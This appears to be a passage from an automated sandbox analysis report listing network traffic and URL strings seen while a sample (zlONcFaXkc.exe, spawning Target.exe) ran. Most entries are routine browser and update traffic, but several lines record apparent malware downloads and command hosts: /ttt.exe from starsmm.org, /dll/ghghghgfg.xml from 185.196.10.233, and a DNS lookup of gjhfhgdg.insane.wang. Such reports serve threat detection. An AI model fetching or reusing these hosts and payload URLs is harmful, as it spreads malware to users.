Source: global traffic HTTP traffic detected: GET /staticsb/statics/latest/icons/office-icons/Engage_24x.svg HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /staticsb/statics/latest/icons/office-icons/Yammer_24x.svg HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /staticsb/statics/latest/icons/office-icons/Calendar_24x.svg HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /staticsb/statics/latest/icons/office-icons/ToDo_24x.svg HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /staticsb/statics/latest/icons/office-icons/Viva_24x.svg HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=nkGyhUBOnovzuz5&MD=oygleuew HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /assets/addressbar_uu_files.en-gb/1.0.2/asset?sv=2017-07-29&sr=c&sig=R83mlHRCqeHRG9T0loza5cz3U8zjuZzQy2wVvoSHGHw%3D&st=2021-01-01T00%3A00%3A00Z&se=2024-06-30T00%3A00%3A00Z&sp=r&assetgroup=AddressBar HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: AddressBarSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /ttt.exe HTTP/1.1Host: starsmm.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dll/ghghghgfg.xml HTTP/1.1Host: 185.196.10.233Connection: Keep-Alive
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: gjhfhgdg.insane.wang
Source: unknown HTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: application/json; charset=utf-8Access-Control-Allow-Headers: TicketType,RequestContinuationKey,AuthToken,Content-Type,x-client-activityid,ms-cv,OneSvc-Uni-Feat-Tun,signedInCookieName,muid,appid,User-Location,user-location,userauthtoken,usertickettype,sitename,s2sauthtoken,thumbprint,Authorization,Ent-Authorization,UserIdToken,DDD-TMPL,DDD-ActivityId,DDD-FeatureSet,DDD-Session-ID,Date,date,ads-referer,ads-referer,taboola-sessionId,taboola-sessionid,Akamai-Request-ID,Akamai-Server-IP,X-MSEdge-Ref,DDD-DebugId,s-xbox-token,OneWebServiceLatency,X-FD-Features,DDD-UserType,traceparent,Widgets,Muted,Velocity,DDD-Auth-Features,SoftLanding,PrefMigratedAccess-Control-Expose-Headers: TicketType,RequestContinuationKey,AuthToken,Content-Type,x-client-activityid,ms-cv,OneSvc-Uni-Feat-Tun,signedInCookieName,muid,appid,User-Location,user-location,userauthtoken,usertickettype,sitename,s2sauthtoken,thumbprint,Authorization,Ent-Authorization,UserIdToken,DDD-TMPL,DDD-ActivityId,DDD-FeatureSet,DDD-Session-ID,Date,date,ads-referer,ads-referer,taboola-sessionId,taboola-sessionid,Akamai-Request-ID,Akamai-Server-IP,X-MSEdge-Ref,DDD-DebugId,s-xbox-token,OneWebServiceLatency,X-FD-Features,DDD-UserType,traceparent,Widgets,Muted,Velocity,DDD-Auth-Features,SoftLanding,PrefMigratedDDD-AuthenticatedWithJwtFlow: FalseDDD-UserType: AnonymousMuidDDD-ActivityId: 662821dd-7e47-4936-932f-4df8712adf71DDD-StrategyExecutionLatency: 00:00:00.0012995,00:00:00.0014526DDD-DebugId: 662821dd-7e47-4936-932f-4df8712adf71|2024-04-23T21:02:21.4860540Z|fabric_msn|ESU|News_595DDD-Auth-Features: MuidStateOrigin:MuidFromCookieOneWebServiceLatency: 2X-MSEdge-ResponseInfo: 2Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UAX-Ceto-ref: 662821dd7e474936932f4df8712adf71|AFD:662821dd7e474936932f4df8712adf71|2024-04-23T21:02:21.479ZX-MSEdge-Ref: Ref A: A8C57D43280F4A7F8E642476C0747D98 Ref B: ASHEDGE1415 Ref C: 2024-04-23T21:02:21ZExpires: Tue, 23 Apr 2024 21:02:21 GMTDate: Tue, 23 Apr 2024 21:02:21 GMTContent-Length: 74Connection: closeSet-Cookie: _C_ETH=1; expires=Mon, 22 Apr 2024 21:02:21 GMT; domain=.msn.com; path=/; secure; httponlySet-Cookie: _C_Auth=Set-Cookie: MUIDB=09C025F5A71D6FE2180F319FA60A6E8D; expires=Sun, 18 May 2025 21:02:21 GMT; path=/; httponlySet-Cookie: _EDGE_S=F=1&SID=14B0D2560B6E6C25271CC63C0A196DE9; domain=.msn.com; path=/; httponlyAkamai-Request-BC: [a=23.11.231.159,b=402745566,c=g,n=US_GA_ATLANTA,o=20940],[a=204.79.197.203,c=o]Server-Timing: clientrtt; dur=105, clienttt; dur=36, origin; dur=31 , cdntime; dur=5Akamai-Cache-Status: NotCacheable from childAkamai-Server-IP: 23.11.231.159Akamai-Request-ID: 180168deAccess-Control-Allow-Methods: PUT,PATCH,POST,GET,OPT
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: application/json; charset=utf-8Access-Control-Allow-Headers: TicketType,RequestContinuationKey,AuthToken,Content-Type,x-client-activityid,ms-cv,OneSvc-Uni-Feat-Tun,signedInCookieName,muid,appid,User-Location,user-location,userauthtoken,usertickettype,sitename,s2sauthtoken,thumbprint,Authorization,Ent-Authorization,UserIdToken,DDD-TMPL,DDD-ActivityId,DDD-FeatureSet,DDD-Session-ID,Date,date,ads-referer,ads-referer,taboola-sessionId,taboola-sessionid,Akamai-Request-ID,Akamai-Server-IP,X-MSEdge-Ref,DDD-DebugId,s-xbox-token,OneWebServiceLatency,X-FD-Features,DDD-UserType,traceparent,Widgets,Muted,Velocity,DDD-Auth-Features,SoftLanding,PrefMigratedAccess-Control-Expose-Headers: TicketType,RequestContinuationKey,AuthToken,Content-Type,x-client-activityid,ms-cv,OneSvc-Uni-Feat-Tun,signedInCookieName,muid,appid,User-Location,user-location,userauthtoken,usertickettype,sitename,s2sauthtoken,thumbprint,Authorization,Ent-Authorization,UserIdToken,DDD-TMPL,DDD-ActivityId,DDD-FeatureSet,DDD-Session-ID,Date,date,ads-referer,ads-referer,taboola-sessionId,taboola-sessionid,Akamai-Request-ID,Akamai-Server-IP,X-MSEdge-Ref,DDD-DebugId,s-xbox-token,OneWebServiceLatency,X-FD-Features,DDD-UserType,traceparent,Widgets,Muted,Velocity,DDD-Auth-Features,SoftLanding,PrefMigratedDDD-AuthenticatedWithJwtFlow: FalseDDD-UserType: AnonymousMuidDDD-ActivityId: 662821e3-7c77-4618-afd4-d047e32a6ccbDDD-StrategyExecutionLatency: 00:00:00.0011697,00:00:00.0013259DDD-DebugId: 662821e3-7c77-4618-afd4-d047e32a6ccb|2024-04-23T21:02:27.8856281Z|fabric_msn|ESU|News_645DDD-Auth-Features: MuidStateOrigin:MuidFromCookieOneWebServiceLatency: 2X-MSEdge-ResponseInfo: 2Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UAX-Ceto-ref: 662821e37c774618afd4d047e32a6ccb|AFD:662821e37c774618afd4d047e32a6ccb|2024-04-23T21:02:27.880ZX-MSEdge-Ref: Ref A: 2FE1575012CC48F381EA25BFB9807BBB Ref B: BL2EDGE2411 Ref C: 2024-04-23T21:02:27ZExpires: Tue, 23 Apr 2024 21:02:27 GMTDate: Tue, 23 Apr 2024 21:02:27 GMTContent-Length: 74Connection: closeSet-Cookie: _C_ETH=1; expires=Mon, 22 Apr 2024 21:02:27 GMT; domain=.msn.com; path=/; secure; httponlySet-Cookie: _C_Auth=Set-Cookie: _EDGE_S=F=1&SID=14B0D2560B6E6C25271CC63C0A196DE9; domain=.msn.com; path=/; httponlyAkamai-Request-BC: [a=23.11.231.159,b=402749418,c=g,n=US_GA_ATLANTA,o=20940],[a=204.79.197.203,c=o]Server-Timing: clientrtt; dur=105, clienttt; dur=39, origin; dur=37 , cdntime; dur=2Akamai-Cache-Status: NotCacheable from childAkamai-Server-IP: 23.11.231.159Akamai-Request-ID: 180177eaAccess-Control-Allow-Methods: PUT,PATCH,POST,GET,OPTIONS,DELETEAccess-Control-Allow-Credentials: trueAccess-Control-Allow-Origin: https://ntp.msn.comX-AS-S
Source: Target.exe, 00000001.00000002.4116525327.000001D09B6C1000.00000004.00000800.00020000.00000000.sdmp, Target.exe, 00000001.00000002.4263822421.000001D0B3FC6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.196.10.233/dll/ghghghgfg.xml
Source: svchost.exe, 00000007.00000002.4113686005.000001CC77400000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000007.00000003.3433799346.000001CC7748E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/
Source: svchost.exe, 00000007.00000003.3433799346.000001CC7748E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/250
Source: svchost.exe, 00000007.00000003.1738844921.000001CC77618000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: svchost.exe, 00000007.00000003.1738844921.000001CC77618000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: qmgr.db.7.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.7.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000007.00000003.1738844921.000001CC77618000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000007.00000003.1738844921.000001CC77618000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000007.00000002.4112917363.000001CC72702000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2391574900.000001CC773E2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/an2dmhqv5igncgwzelkqyugk5q_2024.4.19.0/go
Source: svchost.exe, 00000007.00000003.1738844921.000001CC7764D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: svchost.exe, 00000007.00000002.4113907895.000001CC7748E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.3433799346.000001CC7748E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com:80
Source: qmgr.db.7.dr String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: zlONcFaXkc.exe, 00000000.00000002.1681293502.000001DFC2096000.00000004.00000020.00020000.00000000.sdmp, Target.exe, 00000001.00000002.4273287178.000001D0B4314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schemas.m
Source: Target.exe, 00000001.00000002.4268426290.000001D0B4081000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schemas.microsof.com
Source: zlONcFaXkc.exe, 00000000.00000002.1682381223.000001DFC22F2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schemas.microsoft
Source: zlONcFaXkc.exe, 00000000.00000002.1666984608.000001DFA9865000.00000004.00000800.00020000.00000000.sdmp, Target.exe, 00000001.00000002.4116525327.000001D09B6C1000.00000004.00000800.00020000.00000000.sdmp, zcezeaqsuhi.exe, 00000002.00000002.2017176866.000002A5BB58B000.00000004.00000800.00020000.00000000.sdmp, zcezeaqsuhi.exe, 00000002.00000002.2017176866.000002A5BB6C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.9.dr String found in binary or memory: http://upx.sf.net
Source: chromecache_514.13.dr String found in binary or memory: http://www.broofa.com
Source: zcezeaqsuhi.exe, 00000002.00000002.2017176866.000002A5BB6DA000.00000004.00000800.00020000.00000000.sdmp, 2cc80dabc69f58b6_0.10.dr, background.js.2.dr String found in binary or memory: http://www.gzip.org/zlib/rfc-gzip.html
Source: chromecache_520.13.dr String found in binary or memory: https://accounts.google.com/o/oauth2/auth
Source: chromecache_520.13.dr String found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
Source: Reporting and NEL.10.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingcsp
Source: chromecache_514.13.dr, chromecache_520.13.dr String found in binary or memory: https://apis.google.com
Source: 4cb013792b196a35_1.10.dr String found in binary or memory: https://assets.msn.com/service/news/feed/pages/ntp
Source: 4cb013792b196a35_1.10.dr String found in binary or memory: https://assets.msn.com/service/news/feed/pages/weblayout
Source: 4cb013792b196a35_1.10.dr String found in binary or memory: https://assets.msn.com/serviceak/news/feed/pages/ntp
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://bard.google.com/
Source: 4cb013792b196a35_1.10.dr String found in binary or memory: https://bit.ly/wb-precache
Source: Reporting and NEL.10.dr String found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
Source: Network Persistent State0.10.dr String found in binary or memory: https://chrome.cloudflare-dns.com
Source: manifest.json0.10.dr String found in binary or memory: https://chrome.google.com/webstore/
Source: manifest.json0.10.dr String found in binary or memory: https://chromewebstore.google.com/
Source: 9d44da8e-adec-4a59-9791-d41df16adce1.tmp.12.dr String found in binary or memory: https://clients2.google.com
Source: manifest.json.10.dr String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: 9d44da8e-adec-4a59-9791-d41df16adce1.tmp.12.dr String found in binary or memory: https://clients2.googleusercontent.com
Source: chromecache_520.13.dr String found in binary or memory: https://clients6.google.com
Source: chromecache_520.13.dr String found in binary or memory: https://content.googleapis.com
Source: chromecache_520.13.dr String found in binary or memory: https://csp.withgoogle.com/csp/lcreport/
Source: Reporting and NEL.10.dr String found in binary or memory: https://deff.nelreports.net/api/report
Source: Reporting and NEL.10.dr String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: Reporting and NEL.10.dr String found in binary or memory: https://deff.nelreports.net/api/report?cat=msnw
Source: manifest.json.10.dr String found in binary or memory: https://docs.google.com/
Source: chromecache_520.13.dr String found in binary or memory: https://domains.google.com/suggest/flow
Source: manifest.json.10.dr String found in binary or memory: https://drive-autopush.corp.google.com/
Source: manifest.json.10.dr String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: manifest.json.10.dr String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: manifest.json.10.dr String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: manifest.json.10.dr String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: manifest.json.10.dr String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: manifest.json.10.dr String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: manifest.json.10.dr String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: manifest.json.10.dr String found in binary or memory: https://drive-preprod.corp.google.com/
Source: manifest.json.10.dr String found in binary or memory: https://drive-staging.corp.google.com/
Source: manifest.json.10.dr String found in binary or memory: https://drive.google.com/
Source: 000003.log0.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
Source: 000003.log.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.75/asset?sv=2017-07-29&sr=c&sig=
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_163_music.png/1.0.3/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_amazon_music_light.png/1.4.13/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_bard_light.png/1.0.1/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_hc.png/1.0.3/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_dark.png/1.0.3/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_light.png/1.0.3/asse
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_dark.png/1.0.6/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_light.png/1.0.6/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_facebook_messenger.png/1.5.14/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gaana.png/1.0.3/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gmail.png/1.5.4/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_help.png/1.0.0/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_iHeart.png/1.0.3/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_instagram.png/1.4.13/asset
